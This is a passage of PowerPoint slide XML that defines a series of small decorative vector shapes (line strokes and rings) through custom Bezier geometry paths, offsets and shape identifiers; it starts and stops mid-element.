            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3021644" y="5055609"/>
                <a:ext cx="122725" cy="98600"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4909" h="3944" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="322" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="243" y="0"/>
                      <a:pt x="165" y="34"/>
                      <a:pt x="115" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="223"/>
                      <a:pt x="23" y="406"/>
                      <a:pt x="160" y="497"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="4406" y="3876"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="4452" y="3921"/>
                      <a:pt x="4520" y="3944"/>
                      <a:pt x="4589" y="3944"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4680" y="3944"/>
                      <a:pt x="4748" y="3898"/>
                      <a:pt x="4817" y="3830"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4908" y="3716"/>
                      <a:pt x="4885" y="3533"/>
                      <a:pt x="4771" y="3419"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="503" y="64"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="23"/>
                      <a:pt x="386" y="0"/>
                      <a:pt x="322"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85" name="Google Shape;1263;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{654AE28C-5E32-08EB-67F8-233B6B052D4F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4444250" y="635625"/>
                <a:ext cx="74775" cy="136525"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2991" h="5461" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="310" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="269" y="1"/>
                      <a:pt x="226" y="9"/>
                      <a:pt x="183" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="96"/>
                      <a:pt x="0" y="279"/>
                      <a:pt x="69" y="416"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2420" y="5300"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2465" y="5414"/>
                      <a:pt x="2557" y="5460"/>
                      <a:pt x="2671" y="5460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2717" y="5460"/>
                      <a:pt x="2762" y="5460"/>
                      <a:pt x="2808" y="5437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2945" y="5369"/>
                      <a:pt x="2990" y="5209"/>
                      <a:pt x="2922" y="5049"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="571" y="165"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="521" y="64"/>
                      <a:pt x="422" y="1"/>
                      <a:pt x="310"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86" name="Google Shape;1264;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDA44254-3194-AEF2-503E-94982C4E43BF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="579925" y="2930925"/>
                <a:ext cx="122700" cy="98625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4908" h="3945" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="320" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="238" y="1"/>
                      <a:pt x="154" y="35"/>
                      <a:pt x="92" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="23" y="407"/>
                      <a:pt x="137" y="498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="4406" y="3876"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="4451" y="3922"/>
                      <a:pt x="4520" y="3945"/>
                      <a:pt x="4588" y="3945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4657" y="3945"/>
                      <a:pt x="4748" y="3899"/>
                      <a:pt x="4794" y="3831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4908" y="3717"/>
                      <a:pt x="4885" y="3534"/>
                      <a:pt x="4748" y="3420"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="503" y="65"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="23"/>
                      <a:pt x="386" y="1"/>
                      <a:pt x="320"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87" name="Google Shape;1265;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3B5D35F-B193-2F5C-A32C-C99FE9DAF4FC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6695950" y="3134175"/>
                <a:ext cx="143825" cy="59725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="5753" h="2389" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="5428" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5399" y="1"/>
                      <a:pt x="5370" y="5"/>
                      <a:pt x="5342" y="15"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="229" y="1841"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="1886"/>
                      <a:pt x="1" y="2046"/>
                      <a:pt x="47" y="2206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="2320"/>
                      <a:pt x="206" y="2388"/>
                      <a:pt x="321" y="2388"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="343" y="2388"/>
                      <a:pt x="389" y="2388"/>
                      <a:pt x="412" y="2366"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="5525" y="562"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="5684" y="494"/>
                      <a:pt x="5753" y="334"/>
                      <a:pt x="5707" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5653" y="70"/>
                      <a:pt x="5541" y="1"/>
                      <a:pt x="5428"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88" name="Google Shape;1266;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BC25D27-45FB-3C95-CFE1-D495BA11ADB4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5039975" y="4862325"/>
                <a:ext cx="46250" cy="146750"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1850" h="5870" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="300" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="284" y="0"/>
                      <a:pt x="268" y="1"/>
                      <a:pt x="252" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="49"/>
                      <a:pt x="1" y="209"/>
                      <a:pt x="47" y="346"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1256" y="5641"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1302" y="5778"/>
                      <a:pt x="1416" y="5870"/>
                      <a:pt x="1530" y="5870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1553" y="5870"/>
                      <a:pt x="1576" y="5870"/>
                      <a:pt x="1599" y="5847"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1759" y="5824"/>
                      <a:pt x="1850" y="5664"/>
                      <a:pt x="1827" y="5504"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="594" y="232"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="553" y="88"/>
                      <a:pt x="439" y="0"/>
                      <a:pt x="300"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89" name="Google Shape;1267;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED120E6-90F2-D87F-F011-BCBA799A0A20}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1269825" y="4614525"/>
                <a:ext cx="76475" cy="136050"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3059" h="5442" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2718" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2614" y="1"/>
                      <a:pt x="2513" y="52"/>
                      <a:pt x="2465" y="146"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="69" y="5031"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5168"/>
                      <a:pt x="69" y="5328"/>
                      <a:pt x="206" y="5396"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="251" y="5419"/>
                      <a:pt x="297" y="5442"/>
                      <a:pt x="343" y="5442"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="434" y="5442"/>
                      <a:pt x="548" y="5373"/>
                      <a:pt x="594" y="5282"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2990" y="397"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3059" y="260"/>
                      <a:pt x="2990" y="101"/>
                      <a:pt x="2853" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2811" y="11"/>
                      <a:pt x="2764" y="1"/>
                      <a:pt x="2718"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90" name="Google Shape;1268;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C437DBB-F24D-5EB5-EBA9-51EA7AD5E1B0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6793550" y="1389425"/>
                <a:ext cx="75900" cy="135950"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3036" h="5438" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2736" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2627" y="1"/>
                      <a:pt x="2515" y="65"/>
                      <a:pt x="2465" y="165"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="69" y="5027"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5164"/>
                      <a:pt x="69" y="5346"/>
                      <a:pt x="206" y="5415"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="251" y="5437"/>
                      <a:pt x="297" y="5437"/>
                      <a:pt x="320" y="5437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="434" y="5437"/>
                      <a:pt x="525" y="5392"/>
                      <a:pt x="594" y="5278"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2967" y="416"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3036" y="279"/>
                      <a:pt x="2990" y="96"/>
                      <a:pt x="2853" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2817" y="9"/>
                      <a:pt x="2777" y="1"/>
                      <a:pt x="2736"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91" name="Google Shape;1269;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29120522-0404-3991-F8F0-3577C4985233}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1094625" y="2300825"/>
                <a:ext cx="74775" cy="74800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2991" h="2992" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1484" y="572"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2009" y="572"/>
                      <a:pt x="2420" y="982"/>
                      <a:pt x="2420" y="1485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2420" y="2010"/>
                      <a:pt x="2009" y="2420"/>
                      <a:pt x="1484" y="2420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="982" y="2420"/>
                      <a:pt x="571" y="2010"/>
                      <a:pt x="571" y="1485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="571" y="982"/>
                      <a:pt x="982" y="572"/>
                      <a:pt x="1484" y="572"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1484" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="663" y="1"/>
                      <a:pt x="1" y="663"/>
                      <a:pt x="1" y="1485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2306"/>
                      <a:pt x="663" y="2991"/>
                      <a:pt x="1484" y="2991"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2306" y="2991"/>
                      <a:pt x="2991" y="2306"/>
                      <a:pt x="2991" y="1485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2991" y="663"/>
                      <a:pt x="2306" y="1"/>
                      <a:pt x="1484"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92" name="Google Shape;1270;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E12025-5F0C-0857-4A37-30EBEDA98A01}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5709061" y="5218468"/>
                <a:ext cx="74200" cy="74775"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2968" h="2991" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1484" y="571"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1986" y="571"/>
                      <a:pt x="2397" y="982"/>
                      <a:pt x="2397" y="1507"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2397" y="2009"/>
                      <a:pt x="1986" y="2420"/>
                      <a:pt x="1484" y="2420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="982" y="2420"/>
                      <a:pt x="571" y="2009"/>
                      <a:pt x="571" y="1507"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="571" y="982"/>
                      <a:pt x="982" y="571"/>
                      <a:pt x="1484" y="571"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1484" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="663" y="1"/>
                      <a:pt x="1" y="686"/>
                      <a:pt x="1" y="1507"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2329"/>
                      <a:pt x="663" y="2991"/>
                      <a:pt x="1484" y="2991"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2306" y="2991"/>
                      <a:pt x="2968" y="2329"/>
                      <a:pt x="2968" y="1507"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2968" y="686"/>
                      <a:pt x="2306" y="1"/>
                      <a:pt x="1484"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93" name="Google Shape;1271;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A720625-26FA-6526-AEB6-30D343283E96}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1498650" y="856000"/>
                <a:ext cx="74775" cy="74200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2991" h="2968" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1484" y="571"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2009" y="571"/>
                      <a:pt x="2420" y="982"/>
                      <a:pt x="2420" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2420" y="1986"/>
                      <a:pt x="2009" y="2397"/>
                      <a:pt x="1484" y="2397"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="982" y="2397"/>
                      <a:pt x="571" y="1986"/>
                      <a:pt x="571" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="571" y="982"/>
                      <a:pt x="982" y="571"/>
                      <a:pt x="1484" y="571"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1484" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="662" y="0"/>
                      <a:pt x="0" y="662"/>
                      <a:pt x="0" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2306"/>
                      <a:pt x="662" y="2968"/>
                      <a:pt x="1484" y="2968"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2305" y="2968"/>
                      <a:pt x="2990" y="2306"/>
                      <a:pt x="2990" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2990" y="662"/>
                      <a:pt x="2305" y="0"/>
                      <a:pt x="1484"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94" name="Google Shape;1272;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DD2C13-89FC-708F-FCB9-0C2D9D222D5C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="603900" y="4193050"/>
                <a:ext cx="74775" cy="74200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2991" h="2968" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1484" y="571"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2009" y="571"/>
                      <a:pt x="2420" y="982"/>
                      <a:pt x="2420" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2420" y="1986"/>
                      <a:pt x="2009" y="2397"/>
                      <a:pt x="1484" y="2397"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="982" y="2397"/>
                      <a:pt x="571" y="1986"/>
                      <a:pt x="571" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="571" y="982"/>
                      <a:pt x="982" y="571"/>
                      <a:pt x="1484" y="571"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1484" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="662" y="1"/>
                      <a:pt x="0" y="662"/>
                      <a:pt x="0" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2306"/>
                      <a:pt x="662" y="2968"/>
                      <a:pt x="1484" y="2968"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2305" y="2968"/>
                      <a:pt x="2990" y="2306"/>
                      <a:pt x="2990" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2990" y="662"/>
                      <a:pt x="2305" y="1"/>
                      <a:pt x="1484"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95" name="Google Shape;1273;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16CA7D11-C263-4D00-1092-674C152AF4FD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6247450" y="795500"/>
                <a:ext cx="74200" cy="74800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2968" h="2992" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1484" y="572"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1986" y="572"/>
                      <a:pt x="2397" y="982"/>
                      <a:pt x="2397" y="1485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2397" y="2010"/>
                      <a:pt x="1986" y="2420"/>
                      <a:pt x="1484" y="2420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="982" y="2420"/>
                      <a:pt x="571" y="2010"/>
                      <a:pt x="571" y="1485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="571" y="982"/>
                      <a:pt x="982" y="572"/>
                      <a:pt x="1484" y="572"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1484" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="662" y="1"/>
                      <a:pt x="0" y="663"/>
                      <a:pt x="0" y="1485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2306"/>
                      <a:pt x="662" y="2991"/>
                      <a:pt x="1484" y="2991"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2306" y="2991"/>
                      <a:pt x="2968" y="2306"/>
                      <a:pt x="2968" y="1485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2968" y="663"/>
                      <a:pt x="2306" y="1"/>
                      <a:pt x="1484"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96" name="Google Shape;1274;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A8C637A-6D36-3D43-4580-F237068CDD7D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3710975" y="885675"/>
                <a:ext cx="74775" cy="74775"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2991" h="2991" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1484" y="571"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2009" y="571"/>
                      <a:pt x="2420" y="982"/>
                      <a:pt x="2420" y="1507"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2420" y="2009"/>
                      <a:pt x="2009" y="2420"/>
                      <a:pt x="1484" y="2420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="982" y="2420"/>
                      <a:pt x="571" y="2009"/>
                      <a:pt x="571" y="1507"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="571" y="982"/>
                      <a:pt x="982" y="571"/>
                      <a:pt x="1484" y="571"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1484" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="663" y="0"/>
                      <a:pt x="1" y="685"/>
                      <a:pt x="1" y="1507"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2328"/>
                      <a:pt x="663" y="2990"/>
                      <a:pt x="1484" y="2990"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2306" y="2990"/>
                      <a:pt x="2991" y="2328"/>
                      <a:pt x="2991" y="1507"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2991" y="685"/>
                      <a:pt x="2306" y="0"/>
                      <a:pt x="1484"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97" name="Google Shape;1275;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B1CC3E6-842A-FD7A-04A8-E1A4C5F1C1EB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1816475" y="4928600"/>
                <a:ext cx="74775" cy="74200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2991" h="2968" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1507" y="571"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2009" y="571"/>
                      <a:pt x="2420" y="982"/>
                      <a:pt x="2420" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2420" y="1986"/>
                      <a:pt x="2009" y="2397"/>
                      <a:pt x="1507" y="2397"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="982" y="2397"/>
                      <a:pt x="571" y="1986"/>
                      <a:pt x="571" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="571" y="982"/>
                      <a:pt x="982" y="571"/>
                      <a:pt x="1507" y="571"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1507" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="686" y="0"/>
                      <a:pt x="1" y="662"/>
                      <a:pt x="1" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2306"/>
                      <a:pt x="686" y="2968"/>
                      <a:pt x="1507" y="2968"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2306" y="2968"/>
                      <a:pt x="2991" y="2306"/>
                      <a:pt x="2991" y="1484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2991" y="662"/>
                      <a:pt x="2306" y="0"/>
                      <a:pt x="1507"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98" name="Google Shape;1276;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
